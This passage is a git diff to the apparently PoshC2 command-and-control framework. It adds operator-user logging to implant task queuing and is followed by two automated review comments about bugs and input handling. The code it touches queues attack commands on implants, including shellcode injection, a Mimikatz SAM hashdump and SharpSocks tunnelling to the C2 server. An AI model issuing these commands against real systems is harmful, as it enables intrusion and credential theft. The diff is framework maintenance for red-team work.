-URLs '%s'" % (command,urls), randomuri) + new_task("%s -URLs '%s'" % (command,urls), user, randomuri) print ("Now use createdaisypayload") elif "inject-shellcode" in command.lower(): #elif (command.lower() == "inject-shellcode") or (command.lower() == "inject-shellcode "): params = re.compile("inject-shellcode", re.IGNORECASE) params = params.sub("", command) - check_module_loaded("Inject-Shellcode.ps1", randomuri) + check_module_loaded("Inject-Shellcode.ps1", randomuri, user) readline.set_completer(filecomplete) path = raw_input("Location of shellcode file: ") t = tabCompleter() 
@@ -1120,8 +1125,8 @@ def runcommand(command, randomuri): shellcodefile = load_file(path) if shellcodefile != None: arch = "64" - new_task("$Shellcode%s=\"%s\"" % (arch,base64.b64encode(shellcodefile)), randomuri) - new_task("Inject-Shellcode -Shellcode ([System.Convert]::FromBase64String($Shellcode%s))%s" % (arch, params), randomuri) + new_task("$Shellcode%s=\"%s\"" % (arch,base64.b64encode(shellcodefile)), user, randomuri) + new_task("Inject-Shellcode -Shellcode ([System.Convert]::FromBase64String($Shellcode%s))%s" % (arch, params), user, randomuri) except Exception as e: print ("Error loading file: %s" % e) @@ -1133,14 +1138,14 @@ def runcommand(command, randomuri): print (ml[14]) elif (command.lower() == "ps") or (command.lower() == "ps "): - new_task("get-processlist", randomuri) + new_task("get-processlist", user, randomuri) elif (command.lower() == "hashdump") or (command.lower() == "hashdump "): - check_module_loaded("Invoke-Mimikatz.ps1", randomuri) - new_task("Invoke-Mimikatz -Command '\"lsadump::sam\"'", randomuri) + check_module_loaded("Invoke-Mimikatz.ps1", randomuri, user) + new_task("Invoke-Mimikatz -Command '\"lsadump::sam\"'", user, randomuri) elif (command.lower() == "sharpsocks") or (command.lower() == "sharpsocks "): - check_module_loaded("SharpSocks.ps1", randomuri) + check_module_loaded("SharpSocks.ps1", randomuri, user) import string from random import choice allchar = string.ascii_letters 
@@ -1148,17 +1153,17 @@ def runcommand(command, randomuri): sharpkey = gen_key() sharpurls = get_sharpurls() sharpurl = select_item("HostnameIP", "C2Server") - new_task("Sharpsocks -Client -Uri %s -Channel %s -Key %s -URLs %s -Insecure -Beacon 2000" % (sharpurl,channel,sharpkey,sharpurls), randomuri) + new_task("Sharpsocks -Client -Uri %s -Channel %s -Key %s -URLs %s -Insecure -Beacon 2000" % (sharpurl,channel,sharpkey,sharpurls), user, randomuri) print ("git clone https://github.com/nettitude/SharpSocks.git") print ("SharpSocksServerTestApp.exe -c %s -k %s -l http://IPADDRESS:8080" % (channel,sharpkey)) elif (command.lower() == "history") or command.lower() == "history ": - startup(get_history()) + startup(user, get_history()) elif "reversedns" in command.lower(): params = re.compile("reversedns ", re.IGNORECASE) params = params.sub("", command) - new_task("[System.Net.Dns]::GetHostEntry(\"%s\")" % params, randomuri) + new_task("[System.Net.Dns]::GetHostEntry(\"%s\")" % params, user, randomuri) elif "createdaisypayload" in command.lower(): createdaisypayload() @@ -1171,11 +1176,11 @@ def runcommand(command, randomuri): else: if command: - new_task(command, randomuri) + new_task(command, user, randomuri) return return -def commandloop(implant_id): +def commandloop(implant_id, user): while(True): try: implant_id_orig = implant_id @@ -1206,7 +1211,7 @@ def commandloop(implant_id): # if "all" run through all implants get_implants() if implant_id.lower() == "all": if command == "back": - startup() + startup(user) implant_split = get_implants() if implant_split: for implant_id in implant_split: @@ -1232,7 +1237,7 @@ def commandloop(implant_id): runcommand(command, implant_id) # then run back around - commandloop(implant_id_orig) + commandloop(implant_id_orig, user) #is this required for a while loop? looks like it would lead to a stackoverflow anyway? except Exception as e: print (Colours.RED) 
@@ -1242,9 +1247,15 @@ def commandloop(implant_id): #print "Error: %s" % e # remove the following comment when publishing to live time.sleep(1) - startup() + startup(user, user) if __name__ == '__main__': original_sigint = signal.getsignal(signal.SIGINT) signal.signal(signal.SIGINT, catch_exit) - startup() + parser = argparse.ArgumentParser(description='The command line for handling implants in PoshC2') + parser.add_argument('-u', '--user', help='the user for this session') + args = parser.parse_args() + user = args.user + if LogUsers is True and user is None: + user = raw_input("Enter your username: ") + startup(user) diff --git a/Tasks.py b/Tasks.py index a5850ad..2fdf5dc 100644 --- a/Tasks.py +++ b/Tasks.py @@ -15,6 +15,7 @@ def newTask(path): if RandomURI in path and tasks: for a in tasks: command = a[2] + user = a[3] user_command = command hostinfo = DB.get_hostinfo(RandomURI) now = datetime.datetime.now() @@ -48,7 +49,7 @@ def newTask(path): except Exception as e: print "Cannot find module, loadmodule is case sensitive!" print e - taskId = DB.insert_task(RandomURI, user_command, None) + taskId = DB.insert_task(RandomURI, user_command, user) if len(str(taskId)) > 5: raise ValueError('Task ID is greater than 5 characters which is not supported.') taskIdStr = "0" * (5 - len(str(taskId))) + str(taskId) @@ -58,8 +59,6 @@ def newTask(path): else: commands += command DB.del_newtasks(str(a[0])) - - if commands is not None: multicmd = "multicmd%s" % commands try:
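Review bot: `startup(user, user)` in commandloop's exception handler passes the username as the `printhelp` argument, so after any error the username is printed where the help text belongs; every other call site in this commit uses `startup(user)` and this line should too. In the `__main__` block the name that will be recorded against every task is accepted as-is — `raw_input` can return an empty string and `-u` any free text — so when `LogUsers` is on it is worth insisting on a non-empty, trimmed value, e.g. `while LogUsers is True and not (user or "").strip(): user = raw_input("Enter your username: ")`. Note that `LogUsers is True` only matches a real bool, so Config.py must define it as `True`/`False` rather than a "Yes"/"No" string like the other settings, and `argparse` must be imported in the ImplantHandler header hunk, which is not in view here. Because this operator-supplied string ends up in `DB.insert_task`, it should be bound as a query parameter rather than formatted into the SQL; the DB.py change is not in view to confirm that.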
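Review bot: `user = a[3]` indexes the newtask row positionally, so it depends on the column order `DB.get_newtasks` returns (the DB.py change is not in view here) and would silently misattribute tasks if that order ever shifts; a short comment would help the next reader: `# a[3] is the operator who queued the task (None when LogUsers is off)`. `user` is assigned only inside `for a in tasks`, which is fine as long as the `DB.insert_task(RandomURI, user_command, user)` call in the following hunk stays within the same loop body — that appears to be the case, but the loop's extent is outside these hunks. newTask's body starts before and continues after this hunk.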